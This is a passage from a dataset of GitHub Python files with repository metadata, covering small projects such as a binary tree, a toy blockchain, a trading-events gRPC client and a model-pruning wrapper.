if char_upper in counts:\n counts[char_upper] += 1\n else:\n counts[char_upper] = 1\n return counts\n","repo_name":"huangjus/count_letters.py","sub_path":"count_letters.py","file_name":"count_letters.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17763082763","text":"#!/usr/bin/env python\n\nimport bitcodin\n\n# Set your API key\nbitcodin.api_key = 'INSERT YOUR API KEY'\n\n# Create an input\ninput_obj = bitcodin.Input(url='http://bitbucketireland.s3.amazonaws.com/Sintel-original-short.mkv')\ninput_result = bitcodin.create_input(input_obj)\n\n# Create encoding profile\nvideo_configs = list()\n\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=4800000,\n profile='Main',\n preset='premium',\n height=1080,\n width=1920\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=2400000,\n profile='Main',\n preset='premium',\n height=768,\n width=1024\n))\nvideo_configs.append(bitcodin.VideoStreamConfig(\n default_stream_id=0,\n bitrate=1200000,\n profile='Main',\n preset='premium',\n height=480,\n width=854\n))\n\naudio_configs = [bitcodin.AudioStreamConfig(default_stream_id=0, bitrate=192000)]\n\nencoding_profile_obj = bitcodin.EncodingProfile('API Test Profile', video_configs, audio_configs)\nencoding_profile_result = bitcodin.create_encoding_profile(encoding_profile_obj)\n\nmanifests = ['mpd', 'm3u8']\n\n# Create a job\njob = bitcodin.Job(\n input_id=input_result.input_id,\n encoding_profile_id=encoding_profile_result.encoding_profile_id,\n manifest_types=manifests\n)\njob_result = bitcodin.create_job(job)\nprint(\"Job created!\")\n\n# Create a thumbnail at second 50 with a height of 320px from a given job\n# Note: You don't have to create a new job for a thumbnail, you can use finished jobs too.\nthumbnail_request = bitcodin.ThumbnailRequest(job_id=job_result.job_id, height=320, position=50)\nthumbnail = bitcodin.create_thumbnail(thumbnail_request)\n\nprint(\"Thumbnail generated!\\nURL to thumbnail: %s\\n\" % thumbnail.thumbnail_url)\n\n","repo_name":"bitmovin/bitcodin-python","sub_path":"examples/create_thumbnail.py","file_name":"create_thumbnail.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"53"} +{"seq_id":"24776480349","text":"import collections\nimport datetime\nimport Crypto.Hash.SHA256 as sha\n\n\nclass Block:\n\tdef __init__(self, merkel_root, prev_block_hash, serial):\n\t\tself.timestamp = datetime.datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n\t\tself.nonce = \"\"\n\t\tself.merkel_root = merkel_root\n\t\tself.prev_block_hash = prev_block_hash\n\t\tself.serial = serial\n\n\t\tfind_nonce(self)\n\n\tdef get_block(self):\n\t\treturn collections.OrderedDict({\n\t\t\t'timestamp': self.timestamp,\n\t\t\t'nonce': self.nonce,\n\t\t\t'merkel_root': self.merkel_root,\n\t\t\t'prev_block_hash': self.prev_block_hash,\n\t\t\t'serial': self.serial\n\t\t})\n\n\ndef find_nonce(block):\n\tprefix = '000'\n\tfor i in range(100000):\n\t\tblock.nonce = i\n\t\thash = hash_block(block.get_block())\n\t\tif hash.startswith(prefix):\n\t\t\tprint(\"\\n----------POW----------\")\n\t\t\tprint(\"hash: \" + hash +\"\\nFound with nonce:\"+str(i))\n\t\t\treturn hash\n\n\ndef hash_block(block):\n\treturn sha.new(str(block).encode('utf8')).hexdigest()\n","repo_name":"mentol555/kripto","sub_path":"block.py","file_name":"block.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10974208710","text":"from datetime import date\nfrom typing import Union\nfrom t10.pessoa import Pessoa\nfrom t10.mecanico import Mecanico\n\n\nclass Bicicleta:\n def __init__(self,\n cor: str,\n comprimento: float,\n altura: float,\n aro: int,\n data_compra: date,\n periodicidade_revisao: int) -> None:\n\n self._dono: Union[Pessoa, None] = None\n self._cor = cor\n self._comprimento = comprimento\n self._altura = altura\n self._aro = aro\n self._ultima_revisao = data_compra\n self._periodicade_revisao = periodicidade_revisao\n self._ultimo_mecanico: Union[Mecanico, None] = None\n\n def pintar(self, nova_cor: str) -> None:\n self._cor = nova_cor\n\n def trocar_roda(self, novo_aro: int) -> None:\n self._aro = novo_aro\n\n def anotar_revisao(self, data: date, mecanico: Mecanico) -> None:\n self._ultima_revisao = data\n self._ultimo_mecanico = mecanico\n\n def atribuir_dono(self, dono: Pessoa) -> None:\n self._dono = dono\n\n def __str__(self) -> str:\n ret_str = \"Descrição da bicicleta\\n\"\n ret_str += f\"Cor: {self._cor}\\n\"\n ret_str += \"Dimensões: \\n\"\n ret_str += f\" Comprimento: {self._comprimento} cm\\n\"\n ret_str += f\" Altura: {self._altura} cm\\n\\n\"\n\n if self._ultimo_mecanico is not None:\n ret_str += f\"Revisada por {self._ultimo_mecanico}, \"\n ret_str += f\"em {self._ultima_revisao.strftime('%d/%m/%Y')}\\n\"\n\n ret_str += f\"A ser revisada a cada {self._periodicade_revisao} dia(s)\"\n\n return ret_str\n","repo_name":"vmvuno/poo-2023-01","sub_path":"t10/bicicleta.py","file_name":"bicicleta.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17716567240","text":"from Decl import Decl\r\nfrom Core import Core\r\nfrom FuncDecl import FuncDecl\r\n\r\nclass DeclSeq:\r\n\t\r\n\tdef parse(self, parser):\r\n\t\tif parser.scanner.currentToken() == Core.INT:\r\n\t\t\tself.decl = Decl()\r\n\t\t\tself.decl.parse(parser)\r\n\t\telse:\r\n\t\t\tself.function = FuncDecl()\r\n\t\t\tself.function.parse(parser)\r\n\t\tif not parser.scanner.currentToken() == Core.BEGIN:\r\n\t\t\tself.ds = DeclSeq()\r\n\t\t\tself.ds.parse(parser)\r\n\t\r\n\tdef semantic(self, parser):\r\n\t\tif hasattr(self, 'decl'):\r\n\t\t\tself.decl.semantic(parser)\r\n\t\telse:\r\n\t\t\tself.function.semantic(parser)\r\n\t\tif hasattr(self, 'ds'):\r\n\t\t\tself.ds.semantic(parser)\r\n\t\r\n\tdef print(self, indent):\r\n\t\tif hasattr(self, 'decl'):\r\n\t\t\tself.decl.print(indent)\r\n\t\telse:\r\n\t\t\tself.function.print(indent)\r\n\t\tif hasattr(self, 'ds'):\r\n\t\t\tself.ds.print(indent)\r\n\r\n\tdef execute(self, executor):\r\n\t\tif hasattr(self, 'decl'):\r\n\t\t\tself.decl.execute(executor)\r\n\t\telse:\r\n\t\t\tself.function.execute(executor)\r\n\t\tif hasattr(self, 'ds'):\r\n\t\t\tself.ds.execute(executor)","repo_name":"DanielH2018/core_language","sub_path":"DeclSeq.py","file_name":"DeclSeq.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41778149181","text":"\"\"\"\n This is a binary search tree class\n the left son value is less then the parent value\n the parent value is less then the right son value\n\"\"\"\n\n\nclass BinaryTree:\n\n def __init__(self, valeur):\n self.val = valeur\n self.right = None\n self.left = None\n \n\n def isLeaf(self):\n return self.left == None and self.right == None\n\n def insert(self,value):\n\n if self.val == value: return\n \n # find the sub tree in which we will insert the value\n\n if self.val < value :\n if(self.right == None) : self.right = BinaryTree(value)\n return self.right.insert(value)\n else:\n if(self.left == None) : self.left = BinaryTree(value)\n return self.left.insert(value)\n\n \n\n\n def prefix_print(self):\n \"\"\"\n we print the value of the current root\n then we print the value of the left son node\n and finally we print the value of the right son node\n \"\"\"\n\n # base case\n if self == None:\n return\n\n if self.isLeaf(): \n print(self.val)\n return\n\n # recursive case\n print(self.val)\n\n if self.left != None:\n self.left.prefix_print() \n\n if self.right != None:\n self.right.prefix_print()\n \n return\n\n\n def infix_print(self):\n \"\"\"\n on affiche le sous arbre gauche\n puis on affiche la racine actuelle\n puis enfin, on affiche le sous arbre droit\n \"\"\"\n\n # base case\n if self == None: \n return\n\n if self.isLeaf(): \n print(self.val)\n return\n\n\n # recursive case\n\n if self.left != None:\n self.left.infix_print()\n \n print(self.val)\n\n if self.right != None:\n self.right.infix_print()\n\n return\n\n\n\n def posfix_print(self):\n \"\"\"\n on affiche le sous arbre gauche\n puis, on affiche le sous arbre droit\n enfin, on affiche la racine\n \"\"\"\n\n # base case\n if self == None: \n return\n\n if self.isLeaf(): \n print(self.val)\n return\n\n\n # recursive case\n\n if self.left != None:\n self.left.posfix_print()\n \n\n if self.right != None:\n self.right.posfix_print()\n\n print(self.val)\n return\n\n\n\n def search(self, value, currentDepth):\n \"\"\"\n search the value withing the binary tree, \n and return the depth in with it resides\n \"\"\"\n\n # base case\n if self == None:\n return -1\n\n if self.isLeaf():\n if self.val == value:\n return currentDepth\n else:\n return -1\n \n if self.val == value:\n return currentDepth\n\n # recursive cases:\n\n if value < self.val:\n # search within the left sub tree\n if self.left != None:\n return self.left.search(value, currentDepth +1)\n else :\n return -1\n \n else :\n # search within the right sub tree\n if self.right != None:\n return self.right.search(value, currentDepth+1)\n else: \n return -1\n\n\n def bfs(self, queue):\n \"\"\"\n this is a breadth first search, in with we \n visit all the adjacent nodes to the current node\n before going one depth further\n \n \"\"\" \n\n # base case\n if self == None:\n return\n \n if self.isLeaf() and self.val not in queue:\n queue.append(self.val)\n return\n\n # visit the current adjacent nodes ( left and right then current)\n \n if self.val not in queue:\n queue.append(self.val)\n\n if self.left != None:\n if self.left.val not in queue:\n queue.append(self.left.val)\n \n if self.right != None:\n if self.right.val not in queue:\n queue.append(self.right.val)\n\n\n\n # recursive case\n if self.left != None:\n self.left.bfs(queue)\n \n if self.right != None:\n self.right.bfs(queue)\n\n \n return queue\n\n\n","repo_name":"MassiGy/DS-practice-with-python","sub_path":"binaryTrees/BinaryTree.py","file_name":"BinaryTree.py","file_ext":"py","file_size_in_byte":4328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69897977448","text":"import json\nfrom collections import OrderedDict\n\ndef formatOutput(isFailed, output):\n if isFailed > 0:\n output['state'] = 'failed'\n return json.dumps(OrderedDict([('state', output['state']), \n ('confStatus', output['confStatus']), \n ('htpStatus', output['htpStatus']), \n ('ngingxStatus', output['nginxStatus'])]))\n","repo_name":"jonathanmontenez/AdmissionsConfs","sub_path":"app/utils/fmt.py","file_name":"fmt.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26763481135","text":"import random\n\n\nprint('esto es un cadena de caracteres')\n\n\narreglo = [12, 25, 96, 87, 63, 98, 78, 63, 75]\n\nfor i in range(0, len(arreglo)):\n valor = arreglo[i]\n print(f'el valor {valor} esta pocision {i}' )\n\nl = 20\nlista = [random.randint(0, 100) for i in range(l)]\nprint(lista)\n\n#ejemplo de como desestructurar en python \nproductos = [\n {'nombre': 'jabon palmolive', 'precio': 12},\n {'nombre': 'leche en polvo', 'precio': 120},\n {'nombre': 'arroz pinillar', 'precio': 150}\n]\n\nproductos.append({'nombre': 'jabon coco', 'precio': 1000})\nproductos.append({'nombre': 'jabon canalita', 'precio': 2000})\n\nprint(productos)\n\nsuma = 0\n\nfor i in range(0, len(productos)):\n elemento = productos[i]\n nombre, precio = elemento.values()\n print(precio)\n suma += precio\n \n \nprint(suma) \n\nprint(5 + 6)","repo_name":"BaguirreTim3/PracticasPython","sub_path":"arreglos/practicas.py","file_name":"practicas.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20726868227","text":"import enchant\nimport pandas as pd\nimport string\nfrom collections import Counter\n\nticker_bin = Counter()\n\ndef clean_word(word):\n res = []\n [res.append(c) for c in word if c not in string.punctuation and c.isalpha()]\n return ''.join(res)\n\ndef ticker_extractor(text):\n global ticker_bin\n words = text.split()\n words = set([clean_word(word) for word in words])\n words = words & tickers | words & set([ticker.upper() for ticker in tickers])\n words = [word for word in words if not d.check(word)\n or (d.check(word) and word.isupper() and not ['A', 'IM'])]\n words = [word.upper() for word in words]\n ticker_bin += Counter(words)\n print(ticker_bin)\n\nprice = pd.read_parquet('rus_price_150321.parquet', engine='pyarrow')\ndiscussion = pd.read_csv('wsb_comments.csv', error_bad_lines=False, index_col=False, dtype='unicode')\ndiscussion = discussion.drop_duplicates('text')\ntickers = price.columns[1::2]\ntickers = [item.split(',') for item in tickers]\ntickers = set((item for sublist in tickers for item in sublist))\ndiscussion['text'] = discussion['text']\nd = enchant.Dict(\"en_US\")\n\ndiscussion = discussion[discussion['text'].notnull()]\ndiscussion.text.apply(lambda x: ticker_extractor(x))\nticker_bin = [word for word, cnt in ticker_bin.most_common(20)]\nprint('end')\nprint(ticker_bin)\n","repo_name":"YanRemes/Analyse-stock-market-based-on-the-sentiment-analysis","sub_path":"1. Most_Commonly_Used_Tickers.py","file_name":"1. Most_Commonly_Used_Tickers.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20711624045","text":"import requests\n\nfrom bs4 import BeautifulSoup\n\noutputFileName = input(\"Enter the name for the output file: \")\nopenFile = open(outputFileName, 'w')\n\nbase_url = 'http://www.vanityfair.com/society/2014/06/monica-lewinsky-humiliation-culture'\nr = requests.get(base_url)\nsoup = BeautifulSoup(r.text, features=\"html.parser\")\n \nfor textP in soup.find_all('p'): \n if textP.a: \n openFile.write(textP.a.text.replace(\"\\n\", \" \").strip())\n else: \n openFile.write(textP.contents[0].strip())\n\nopenFile.close()","repo_name":"ggFletcher/PythonExercises","sub_path":"ScriptPractice21.py","file_name":"ScriptPractice21.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22721285381","text":"import json\nimport logging\nimport threading\nimport time\n\nimport grpc\nfrom webullsdkcore.common import api_type\nfrom webullsdkcore.endpoint.default_endpoint_resolver import \\\n DefaultEndpointResolver\nfrom webullsdkcore.endpoint.resolver_endpoint_request import \\\n ResolveEndpointRequest\nfrom webullsdkcore.retry.retry_condition import RetryCondition\n\nimport webullsdktradeeventscore.events_pb2 as pb\nimport webullsdktradeeventscore.events_pb2_grpc as pb_grpc\nfrom webullsdktradeeventscore.default_retry_policy import (\n DefaultSubscribeRetryPolicy, SubscribeRetryPolicyContext)\nfrom webullsdktradeeventscore.signature_composer import calc_signature\n\n# contentTypes\nJSON = \"application/json\"\nTEXT = \"text/plain\"\n\nDEFAULT_REGION_ID = \"us\"\n\n\nclass EventsClient():\n def __init__(self, app_key, app_secret, region_id=DEFAULT_REGION_ID, host=None, port=443, tls_enable=True, retry_policy=None):\n self._app_key = app_key\n self._app_secret = app_secret\n self._region_id = region_id\n self._tls_enable = tls_enable\n self._endpoint_resolver = DefaultEndpointResolver(self)\n if not host:\n endpoint_request = ResolveEndpointRequest(\n self._region_id, api_type=api_type.EVENTS)\n endpoint = self._endpoint_resolver.resolve(endpoint_request)\n self._host = endpoint\n else:\n self._host = host\n self._port = port\n if retry_policy:\n self._retry_policy = retry_policy\n else:\n self._retry_policy = DefaultSubscribeRetryPolicy()\n\n self._logger = None\n self._in_callback_mutex = threading.Lock()\n self._callback_mutex = threading.RLock()\n # callbacks\n self._on_connect = None\n self._on_events_message = None\n self._on_log = None\n\n def _build_request(self, app_key, app_secret, accounts):\n request = pb.SubscribeRequest(\n subscribeType=1, # only 1 allowed now\n timestamp=int(time.time() * 1000), # millis\n accounts=accounts,\n )\n signature, metadata = calc_signature(app_key, app_secret, request)\n return request, metadata\n\n def _stream_processing(self, stub, accounts):\n retry_policy_context = SubscribeRetryPolicyContext(None, 0, None)\n retries = 0\n final_exception = None\n while True:\n request, metadata = self._build_request(\n self._app_key, self._app_secret, accounts)\n try:\n response_iterator = stub.Subscribe(\n request=request, metadata=metadata)\n for response in response_iterator:\n self._easy_handler(response)\n except grpc.RpcError as rpc_error:\n state = rpc_error._state\n final_exception = rpc_error\n retry_policy_context = SubscribeRetryPolicyContext(\n None, retries, state.code)\n self._easy_log(logging.ERROR, \"grpc error code:%s, error msg:%s, details:%s\",\n state.code, state.details, state.debug_error_string)\n except Exception as exception:\n final_exception = exception\n retry_policy_context = SubscribeRetryPolicyContext(\n exception, retries, None)\n self._easy_log(logging.ERROR, \"grpc exception:%s\", exception)\n retryable = self._retry_policy.should_retry(retry_policy_context)\n if retryable & RetryCondition.NO_RETRY:\n self._easy_log(\n logging.ERROR, \"processing will stopped due to not be retryable, retry_context:%s\", retry_policy_context)\n break\n retry_policy_context.retryable = retryable\n time_to_sleep = self._retry_policy.compute_delay_before_next_retry(\n retry_policy_context)\n self._easy_log(logging.INFO, \"next retry will be started in %s ms, retry_context:%s\",\n time_to_sleep, retry_policy_context)\n time.sleep(time_to_sleep / 1000.0)\n retries += 1\n retry_policy_context.retries_attempted = retries\n if final_exception:\n raise final_exception\n\n @property\n def on_connect(self):\n return self._on_connect\n\n @on_connect.setter\n def on_connect(self, func):\n with self._callback_mutex:\n self._on_connect = func\n\n @property\n def on_events_message(self):\n return self._on_events_message\n\n @on_events_message.setter\n def on_events_message(self, func):\n with self._callback_mutex:\n self._on_events_message = func\n\n @property\n def on_log(self):\n return self._on_log\n\n @on_log.setter\n def on_log(self, func):\n self._on_log = func\n\n def _easy_log(self, level, fmt, *args):\n if self.on_log is not None:\n buf = fmt % args\n try:\n self.on_log(level, buf)\n except Exception:\n pass\n if self._logger is not None:\n self._logger.log(level, fmt, *args)\n\n def enable_logger(self, logger=None):\n if logger is None:\n if self._logger is not None:\n return\n logger = logging.getLogger(__name__)\n self._logger = logger\n\n def disable_logger(self):\n self._logger = None\n\n def _handle_subscribe_success(self, response):\n self._easy_log(\n logging.INFO, \"subscribe success, response:%s\", response)\n with self._callback_mutex:\n on_connect = self.on_connect\n if not on_connect:\n return\n with self._in_callback_mutex:\n try:\n on_connect(self, response.payload, response)\n except Exception as err:\n self._easy_log(\n logging.ERROR, 'Caught exception in on_connect: %s', err)\n raise err\n\n def _handle_default(self, response, level):\n self._easy_log(level, \"response:%s\", response)\n\n def _handle_message(self, response):\n self._easy_log(\n logging.DEBUG, \"message received, response:%s\", response)\n with self._callback_mutex:\n on_events_message = self.on_events_message\n if not on_events_message:\n return\n with self._in_callback_mutex:\n content_type = response.contentType\n _payload = response.payload\n if JSON == content_type:\n try:\n _payload = json.loads(response.payload)\n except Exception as err:\n self._easy_log(\n logging.ERROR, 'Caught exception in decode message: %s, %s', _payload, err)\n raise err\n try:\n on_events_message(response.eventType,\n response.subscribeType, _payload, response)\n except Exception as err:\n self._easy_log(\n logging.ERROR, 'Caught exception in on_events_message: %s', err)\n raise err\n\n def _easy_handler(self, response):\n event_type = response.eventType\n if event_type == pb.SubscribeSuccess:\n self._handle_subscribe_success(response)\n elif event_type == pb.Ping:\n self._handle_default(response, logging.DEBUG)\n elif event_type == pb.AuthError:\n self._handle_default(response, logging.FATAL)\n elif event_type == pb.NumOfConnExceed:\n self._handle_default(response, logging.FATAL)\n elif event_type == pb.SubscribeExpired:\n self._handle_default(response, logging.FATAL)\n else:\n self._handle_message(response)\n\n def do_subscribe(self, accounts):\n target = self._host + \":\" + str(self._port)\n if self._tls_enable:\n ssl_channel_credentials = grpc.ssl_channel_credentials()\n with grpc.secure_channel(target, ssl_channel_credentials) as channel:\n stub = pb_grpc.EventServiceStub(channel)\n self._stream_processing(stub, accounts)\n else:\n with grpc.insecure_channel(target) as channel:\n stub = pb_grpc.EventServiceStub(channel)\n self._stream_processing(stub, accounts)\n","repo_name":"webull-inc/openapi-python-sdk","sub_path":"webull-python-sdk-trade-events-core/webullsdktradeeventscore/events_client.py","file_name":"events_client.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"53"} +{"seq_id":"9755288969","text":"from elixir import *\nimport datetime\n\nmetadata.bind = \"sqlite:///fex.dbf\"\nmetadata.bind.echo = False\n\nclass Entite(Entity):\n using_options(tablename=u'ENTITE')\n codent = Field(Unicode(10))\n nom = Field(Unicode(30))\n description = Field(UnicodeText, default=u\"\" )\n typ = Field(Unicode(10), default=u'CLIENT')\n parent = ManyToOne(u'Entite')\n def __repr__(self):\n return '' % (self.codent, self.typ, self.parent)\n\nclass User(Entity):\n using_options(tablename=u'USER')\n codusr = Field(Unicode(10))\n name = Field(Unicode(30))\n entite = ManyToOne(u'Entite')\n email = Field(Unicode(20))\n IsAdmin = Field(Boolean, default=False)\n def __repr__(self):\n return '' % (self.codusr, self.entite, self.IsAdmin)\n\nclass Fex(Entity):\n using_options(tablename=u'FEX')\n nom = Field(Unicode(30))\n description = Field(UnicodeText)\n status = Field(Unicode(10))\n expediteur = ManyToOne(u'User')\n destinataire = ManyToOne(u'User')\n date_creation = Field(DateTime, default=datetime.datetime.now)\n date_modif = Field(DateTime)\n date_depot = Field(DateTime)\n date_retrait = Field(DateTime)\n\n def __repr__(self):\n return '' % (self.nom, self.status, self.expediteur, self.destinataire) \n\n","repo_name":"chrislyon/fex-file-exchange","sub_path":"fex/src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15770554030","text":"import torch\nfrom optimization.common.base import Compressor\nimport logging\n\n_logger = logging.getLogger(__name__)\n\nclass PrunerModuleWrapper(torch.nn.Module):\n\n def __init__(self, module, module_name, module_type, config, pruner):\n \"\"\"\n Wrap an module to enable data parallel, forward method customization and buffer registeration.\n\n Parameters\n ----------\n module : pytorch module\n the module user wants to compress\n config : dict\n the configurations that users specify for compression\n module_name : str\n the name of the module to compress, wrapper module shares same name\n module_type : str\n the type of the module to compress\n pruner : Pruner\n the pruner used to calculate mask\n \"\"\"\n super().__init__()\n self.module = module\n self.name = module_name\n self.type = module_type\n self.config = config\n self.pruner = pruner\n\n\n self.register_buffer(\"weight_mask\", torch.ones(self.module.weight.shape))\n if hasattr(self.module, \"bias\") and self.module.bias is not None:\n self.register_buffer(\"bias_mask\", torch.ones(self.module.bias.shape))\n else:\n self.register_buffer(\"bias_mask\", None)\n\n def forward(self, *input):\n self.module.weight.data = self.module.weight.data.mul_(self.weight_mask)\n if hasattr(self.module, \"bias\") and self.module.bias is not None:\n self.module.bias.data = self.module.bias.data.mul_(self.bias_mask)\n return self.module(*input)\n\nclass Pruner(Compressor):\n \"\"\"\n Prune to an exact pruning level specification\n\n Attributes\n ----------\n mask_dict : dict\n Dictionary for saving masks, `key` should be layer name and\n `value` should be a tensor which has the same shape with layer's weight\n\n \"\"\"\n def __init__(self, model, config_list, optimizer = None):\n super().__init__(model, config_list, optimizer)\n \n def compress(self):\n self.update_mask()\n return self.bound_model\n \n def upadte_mask(self):\n for wrapper_idx, wrapper in enumerate(self.get_modules_wrapper()):\n masks = self.calc_mask(wrapper, wrapper_idx = wrapper_idx)\n if masks is not None:\n for k in masks:\n assert hasattr(wrapper, k), \"there is no attribute '%s' in wrapper\" %k\n setattr(wrapper, k, masks[k])\n\n\n def calc_mask(self, wrapper, **kwargs):\n \"\"\"\n Pruners should overload this method to provide mask for weight tensors.\n The mask must have the same shape and type comparing to the weight.\n It will be applied with `mul()` operation on the weight.\n This method is effectively hooked to `forward()` method of the model.\n\n Parameters\n ----------\n wrapper : Module\n calculate mask for `wrapper.module`'s weight\n \"\"\"\n raise NotImplementedError(\"Pruners must overload calc_mask()\")\n\n def _wrap_modules(self, layer, config):\n \"\"\"\n Create a wrapper module to replace the original one.\n\n Parameters\n ----------\n layer : LayerInfo\n the layer to instrument the mask\n config : dict\n the configuration for generating the mask\n \"\"\"\n _logger.debug(\"Module detected to compress: %s.\", layer.name)\n wrapper = PrunerModuleWrapper(layer.module, layer.name, layer.type, config, self)\n assert hasattr(layer.module, 'weight'), \"module %s does not have 'weight' attribute\" % layer.name\n wrapper.to(layer.module.weight.device)\n return wrapper\n\n def export_model(self, model_path, mask_path = None, onnx_path = None, input_shape = None, device =None, dummy_input = None, opset_version = None):\n \"\"\"\n Export pruned model weights, masks and onnx model(optional)\n\n Parameters\n ----------\n model_path : str\n path to save pruned model state_dict\n mask_path : str\n (optional) path to save mask dict\n onnx_path : str\n (optional) path to save onnx model\n input_shape : list or tuple\n input shape to onnx model, used for creating a dummy input tensor for torch.onnx.export\n if the input has a complex structure (e.g., a tuple), please directly create the input and\n pass it to dummy_input instead\n note: this argument is deprecated and will be removed; please use dummy_input instead\n device : torch.device\n device of the model, where to place the dummy input tensor for exporting onnx file;\n the tensor is placed on cpu if ```device``` is None\n only useful when both onnx_path and input_shape are passed\n note: this argument is deprecated and will be removed; please use dummy_input instead\n dummy_input: torch.Tensor or tuple\n dummy input to the onnx model; used when input_shape is not enough to specify dummy input\n user should ensure that the dummy_input is on the same device as the model\n opset_version: int\n opset_version parameter for torch.onnx.export; only useful when onnx_path is not None\n if not passed, torch.onnx.export will use its default opset_version\n \"\"\"\n assert model_path is not None, \"model_path must be specified\"\n mask_dict = {}\n self._unwarp_model()\n\n for wrapper in self.get_modules_wrapper():\n weight_mask = wrapper.weight_mask\n bias_mask = wrapper.bias_mask\n if weight_mask is not None:\n mask_sum = weight_mask.sum().item()\n mask_num = weight_mask.numel()\n _logger.debug(\"Layer: %s Sparsity: %.4f\", wrapper.name, 1 - mask_sum / mask_num)\n wrapper.module.weight.data = wrapper.module.weight.data.mul(weight_mask)\n if bias_mask is not None:\n wrapper.module.bias.data = wrapper.module.bias.data.mul(bias_mask)\n mask_dict[wrapper.name] = {\n \"weight\" : weight_mask,\n \"bias\" : bias_mask\n }\n torch.save(self.bound_model.state_dict(), model_path)\n _logger.info(\"Model state_dict saved to %s\", model_path)\n\n if mask_path is not None:\n torch.save(mask_dict, mask_path)\n \n if onnx_path is not None:\n assert input_shape is not None or dummy_input is not None, 'input_shape or dummy_input must be specified to export onnx model'\n\n if dummy_input is None:\n _logger.warning(\"\"\"The argument input_shape and device will be removed in the future. Please create a dummy input and pass it to dummy_input instead.\"\"\")\n\n if device is None:\n device = torch.device(\"cpu\")\n input_data = torch.Tensor(*input_shape).to(device)\n else:\n input_data = dummy_input\n if opset_version is not None:\n torch.onnx.export(self.bound_model, input_data, onnx_path, opset_version = opset_version)\n else:\n torch.onnx.export(self.bound_model, input_data, onnx_path)\n\n if dummy_input is None:\n _logger.info(\"Model in onnx with input shape %s saved to %s\", input_data.shape, onnx_path)\n else:\n _logger.info(\"Model in onxx saved to %s\", onnx_path)\n self._warp_model()\n\n def load_model_state_dict(self, model_state):\n \"\"\"\n Load the state dict saved from unwrapped model.\n\n Parameters\n ----------\n model_state : dict\n state dict saved from unwrapped model\n \"\"\"\n if self.is_wrapped:\n self._unwarp_model()\n self.bound_model.load_state_dict(model_state)\n self._warp_model()\n else:\n self.bound_model.load_state_dict(model_state)\n\n def get_pruned_weights(self, dim = 0):\n \"\"\"\n Log the simulated prune sparsity.\n\n Parameters\n ----------\n dim : int\n the pruned dim.\n \"\"\"\n for _, wrapper in enumerate(self.get_modules_wrapper):\n weight_mask = wrapper.weight_mask\n mask_size = weight_mask.size()\n if len(mask_size) == 1:\n index = torch.nonzero(weight_mask.abs() != 0).tolist()\n else:\n sum_idx = list(range(len(mask_size)))\n sum_idx.remove(dim)\n index = torch.nonzero(weight_mask.abs().sum(sum_idx) != 0).tolist()\n\n _logger.info(f\"simulated prune {wrapper.name} remain/total : {len(index)}/{weight_mask.size(dim)}\")\n ","repo_name":"AICTechnologyGroup/TorchSlim","sub_path":"optimization/pruning/core/pruner.py","file_name":"pruner.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"40156993778","text":"\"\"\"\ntask_5_1\nВ директории проекта создать каталог log, в котором для клиентской и серверной сторон\nв отдельных модулях формата client_log_config.py и server_log_config.py создать логгеры;\n\"\"\"\n\nimport socket\nimport sys\nimport json\n\n\ndef get_message(client):\n encoded_response = client.recv(MAX_PACKAGE_LENGTH)\n if isinstance(encoded_response, bytes):\n json_response = encoded_response.decode(ENCODING)\n response = json.loads(json_response)\n if isinstance(response, dict):\n return response\n raise ValueError\n raise ValueError\n\n\ndef send_message(sock, message):\n js_message = json.dumps(message)\n encoded_message = js_message.encode(ENCODING)\n sock.send(encoded_message)\n\n\nif __name__ == '__main__':\n # Порт поумолчанию для сетевого ваимодействия\n DEFAULT_PORT = 7777\n # IP адрес по умолчанию для подключения клиента\n DEFAULT_IP_ADDRESS = '127.0.0.1'\n # Максимальная очередь подключений\n MAX_CONNECTIONS = 5\n # Максимальная длинна сообщения в байтах\n MAX_PACKAGE_LENGTH = 1024\n # Кодировка проекта\n ENCODING = 'utf-8'\n\n # Прококол JIM основные ключи:\n ACTION = 'action'\n TIME = 'time'\n USER = 'user'\n ACCOUNT_NAME = 'account_name'\n\n # Прочие ключи, используемые в протоколе\n PRESENCE = 'presence'\n RESPONSE = 'response'\n ERROR = 'error'\n RESPONDEFAULT_IP_ADDRESSSE = 'respondefault_ip_addressse'\n","repo_name":"AndyMcMagadan/client_server_apps","sub_path":"hw_5_1.py","file_name":"hw_5_1.py","file_ext":"py","file_size_in_byte":1728,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19402150934","text":"import numpy as np\n\nfrom ocelot.cpbd.tm_params.first_order_params import FirstOrderParams\nfrom ocelot.cpbd.high_order import m_e_GeV\nfrom ocelot.cpbd.elements.element import 